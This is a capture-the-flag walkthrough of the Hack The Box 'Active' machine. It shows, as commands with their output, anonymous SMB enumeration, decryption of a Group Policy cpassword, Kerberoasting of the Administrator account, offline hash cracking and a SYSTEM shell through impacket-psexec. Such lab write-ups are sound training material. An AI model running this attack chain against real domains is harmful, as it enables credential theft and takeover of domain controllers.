Active
8 minutes to read
Hack The Box. Windows. Easy machine. This machine presents an Active Directory (AD) environment to perform SMB enumeration, password decrypting and Kerberoasting. Basic AD enumeration and exploitation skills are needed to compromise this machine
- OS: Windows
- Difficulty: Easy
- IP Address: 10.10.10.100
- Release: 28 / 07 / 2018
Port scanning
# Nmap 7.92 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.10.100 -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49169,49171,49182
Nmap scan report for 10.10.10.100
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: )
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 12m57s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date:
|_ start_date:
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 71.22 seconds
This machine has ports 53 (DNS), 88 (Kerberos), 135 (MS-RPC), 389 (LDAP) and 445 (SMB) open, within others.
$ crackmapexec smb 10.10.10.100
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
Moreover, we see that the machine is a domain controller (DC) from an Active Directory (AD) environment. We can start adding active.htb into /etc/hosts.
Enumeration
Using smbmap and a null session, we can enumerate SMB shares:
$ smbmap -H 10.10.10.100 -u '' -p '' --no-banner
[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
As it is shown, we have access to a share called Replication. We can download all the files using smbclient as follows:
$ smbclient \\\\10.10.10.100\\Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
10459647 blocks of size 4096. 5725771 blocks available
smb: \> cd active.htb
smb: \active.htb\> recurse ON
smb: \active.htb\> prompt OFF
smb: \active.htb\> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.3 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (7.7 KiloBytes/sec) (average 2.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (1.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (3.0 KiloBytes/sec) (average 2.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (10.4 KiloBytes/sec) (average 3.2 KiloBytes/sec)
Now we have got these files from the machine:
$ tree active.htb
active.htb
├── DfsrPrivate
│ ├── ConflictAndDeleted
│ ├── Deleted
│ └── Installing
├── Policies
│ ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│ │ ├── GPT.INI
│ │ ├── Group Policy
│ │ │ └── GPE.INI
│ │ ├── MACHINE
│ │ │ ├── Microsoft
│ │ │ │ └── Windows NT
│ │ │ │ └── SecEdit
│ │ │ │ └── GptTmpl.inf
│ │ │ ├── Preferences
│ │ │ │ └── Groups
│ │ │ │ └── Groups.xml
│ │ │ └── Registry.pol
│ │ └── USER
│ └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│ ├── GPT.INI
│ ├── MACHINE
│ │ └── Microsoft
│ │ └── Windows NT
│ │ └── SecEdit
│ │ └── GptTmpl.inf
│ └── USER
└── scripts
21 directories, 7 files
Decrypting a password from Groups.xml
There is a file called Groups.xml. This file is used to set group policies for the domain. The file looks like this:
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS" />
</User>
</Groups>
There is a user called SVC_TGS. The user’s password is encrypted in a property called cpassword. However, we are able to decrypt it because Microsoft published the cipher key for the algorithm (more information here). The decryption can be done using gpp-decrypt:
$ gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18
Now let’s check with crackmapexec that the credentials are valid:
$ crackmapexec smb 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18
More SMB enumeration
Now that we have valid credentials, we can check if we have more permissions in SMB:
$ smbmap -H 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18 --no-banner
[+] IP: 10.10.10.100:445 Name: 10.10.10.100 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
We can read files from the Users share, so let’s see if we can find the user.txt flag inside:
$ smbclient \\\\10.10.10.100\\Users -U SVC_TGS
Enter WORKGROUP\SVC_TGS's password:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
10459647 blocks of size 4096. 5725627 blocks available
smb: \> cd SVC_TGS
smb: \SVC_TGS\> dir
. D 0 Sat Jul 21 11:16:32 2018
.. D 0 Sat Jul 21 11:16:32 2018
Contacts D 0 Sat Jul 21 11:14:11 2018
Desktop D 0 Sat Jul 21 11:14:42 2018
Downloads D 0 Sat Jul 21 11:14:23 2018
Favorites D 0 Sat Jul 21 11:14:44 2018
Links D 0 Sat Jul 21 11:14:57 2018
My Documents D 0 Sat Jul 21 11:15:03 2018
My Music D 0 Sat Jul 21 11:15:32 2018
My Pictures D 0 Sat Jul 21 11:15:43 2018
My Videos D 0 Sat Jul 21 11:15:53 2018
Saved Games D 0 Sat Jul 21 11:16:12 2018
Searches D 0 Sat Jul 21 11:16:24 2018
10459647 blocks of size 4096. 5725627 blocks available
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> dir
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt A 34 Sat Jul 21 11:06:25 2018
10459647 blocks of size 4096. 5725627 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
And here we have it:
$ cat user.txt
86d67d8ba232bb6a254aa4d10159e983
Privilege escalation
Moreover, with a valid user we can perform an AS-REP Roasting attack. But indeed with valid credentials, we can perform a Kerberoasting attack.
Kerberoasting attack
This attack consists of requesting the Ticket Granting Service (TGS) for a certain user and cracking the hash offline to get the password (if it is weak).
To setup the attack, first we need to synchronize with the DC (using rdate or ntpdate):
# rdate -n 10.10.10.100
And then we can check if there is any “kerberoastable” user:
$ impacket-GetUserSPNs -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2022-11-10 00:50:33.067749
The user Administrator is “kerberoastable”, so let’s requests its TGS:
$ impacket-GetUserSPNs -dc-ip 10.10.10.100 -request-user Administrator active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2022-11-10 00:50:33.067749
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$04bbe44c152d9356071dc6ca96daa99f$d7c946916bf61962ae661e5e2a99909122fac984887454c4afb0fdb65a2473a24f6b4923d8cc4873f942ddea5da8bd2ca95dbb5beaa96531a79b6ea09e72949c48120b593d199f00cb37cce172a141ddefa901283b58d8a26975747809e9676b146877921f303a671fef2aaa819c4fa31eb0d21af6dc647066da2281c39f20514bea280f91b2867d950d984e0c29ca5f2552eccc5661e142d64c9cce6a8ae92ba1f3f26bb98e0ccbd44b1198f248c8fbffde28001d73f622ae3d68986334564e8cc97e5f9ba1995af6f5ebdfa1ab9562f2dbd86f64a2a3c1c131864669d5d5297280e000660d35993f0551c9d0a37fac9ce805ebedd9797502c59313f3ea3ccce3267d6da67ecac4ee55f7e366ac7a3bd5791c3d3a72d29d31bf39320621c6afe4cf848450fe1a73569b441ddc14c6c1593139ee7c8f9525afdfcf717e9cf03af5222222708d42b3c38e1590d5eb87fab7d7575441593488e0881e4a9911c4709e224891a24f0c6e7435b67b19a41bb5c0ceea0eb859f98b2dcf301598545f25c3fef637d268b1aec6fdd60c9e7bdbdd215b5a28e72a4a567ad50ef808aff5df5cd703edeed35565ee07cfbb5869b8528c3a8a430d0ef403aa50db8c83ca3ed89c2f4473c29c1a57b3c1f80b343c99043eef2f628e564be5ac045c5dd2a2e2781fb1cbe58e68b3b011aa0516bb3fa695a3f148df89c685ba3e8d9ff32f3b577975ad024a50d518cfd3e83414e20375d4b081b4e119bf1ebce02f147b933eeef5ac2fd2f4c92a48582f51bebc53381ef4842d461912aba8792bab3108e1fcfbf8227c4c45f3257c01892e45d65f35633b2b8342096e0e5c4941cd891199db82c746c9431011f06b971b10d59933e2bc3b64c3b5856c7bdf9895de351051894cc0dd435a125a88116f8fdf875f87608909dfe26480694b734402b3754ff92b7fe6cbf872061d40a00767919eae0614b5aea3d942c961d6079c5bc4a7cbf55621e8ecc898b30035299c11f9e47b7da1bbe0e75a82c31c805df94c4e57aae06ba80d4406090887a743dea590de3fc42a7d30516207befb321b581c599e5a4aad05f577220261d9a4549aa0b247cd81dff938193429debcb0bf4379d8bcb097a13c6b9942f1abedc623ed072e64d4e879a349c9e8ac85376668f579079cdfb756b944d5f9712b0ff66b3fa6f667e2be7b557e3a40873f45741c1ab4a6aaec29cd3b6b0eb270c649b47acf9b222f5ce7a201d8ce2938dd2908a0fcca89
Using john and rockyou.txt, we can try to crack the hash:
$ echo '$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$04bbe44c152d9356071dc6ca96daa99f$d7c946916bf61962ae661e5e2a99909122fac984887454c4afb0fdb65a2473a24f6b4923d8cc4873f942ddea5da8bd2ca95dbb5beaa96531a79b6ea09e72949c48120b593d199f00cb37cce172a141ddefa901283b58d8a26975747809e9676b146877921f303a671fef2aaa819c4fa31eb0d21af6dc647066da2281c39f20514bea280f91b2867d950d984e0c29ca5f2552eccc5661e142d64c9cce6a8ae92ba1f3f26bb98e0ccbd44b1198f248c8fbffde28001d73f622ae3d68986334564e8cc97e5f9ba1995af6f5ebdfa1ab9562f2dbd86f64a2a3c1c131864669d5d5297280e000660d35993f0551c9d0a37fac9ce805ebedd9797502c59313f3ea3ccce3267d6da67ecac4ee55f7e366ac7a3bd5791c3d3a72d29d31bf39320621c6afe4cf848450fe1a73569b441ddc14c6c1593139ee7c8f9525afdfcf717e9cf03af5222222708d42b3c38e1590d5eb87fab7d7575441593488e0881e4a9911c4709e224891a24f0c6e7435b67b19a41bb5c0ceea0eb859f98b2dcf301598545f25c3fef637d268b1aec6fdd60c9e7bdbdd215b5a28e72a4a567ad50ef808aff5df5cd703edeed35565ee07cfbb5869b8528c3a8a430d0ef403aa50db8c83ca3ed89c2f4473c29c1a57b3c1f80b343c99043eef2f628e564be5ac045c5dd2a2e2781fb1cbe58e68b3b011aa0516bb3fa695a3f148df89c685ba3e8d9ff32f3b577975ad024a50d518cfd3e83414e20375d4b081b4e119bf1ebce02f147b933eeef5ac2fd2f4c92a48582f51bebc53381ef4842d461912aba8792bab3108e1fcfbf8227c4c45f3257c01892e45d65f35633b2b8342096e0e5c4941cd891199db82c746c9431011f06b971b10d59933e2bc3b64c3b5856c7bdf9895de351051894cc0dd435a125a88116f8fdf875f87608909dfe26480694b734402b3754ff92b7fe6cbf872061d40a00767919eae0614b5aea3d942c961d6079c5bc4a7cbf55621e8ecc898b30035299c11f9e47b7da1bbe0e75a82c31c805df94c4e57aae06ba80d4406090887a743dea590de3fc42a7d30516207befb321b581c599e5a4aad05f577220261d9a4549aa0b247cd81dff938193429debcb0bf4379d8bcb097a13c6b9942f1abedc623ed072e64d4e879a349c9e8ac85376668f579079cdfb756b944d5f9712b0ff66b3fa6f667e2be7b557e3a40873f45741c1ab4a6aaec29cd3b6b0eb270c649b47acf9b222f5ce7a201d8ce2938dd2908a0fcca89' > hash
$ john --wordlist=$WORDLISTS/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:10 DONE 0.09718g/s 1024Kp/s 1024Kc/s 1024KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
And the password is weak, so we have access as Administrator. To enter the machine, we can use impacket-psexec and capture the root.txt flag:
$ impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file UBsxELyA.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service WvVb on 10.10.10.100.....
[*] Starting service WvVb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
87ad1f1ec59362d0537d15ce706b3229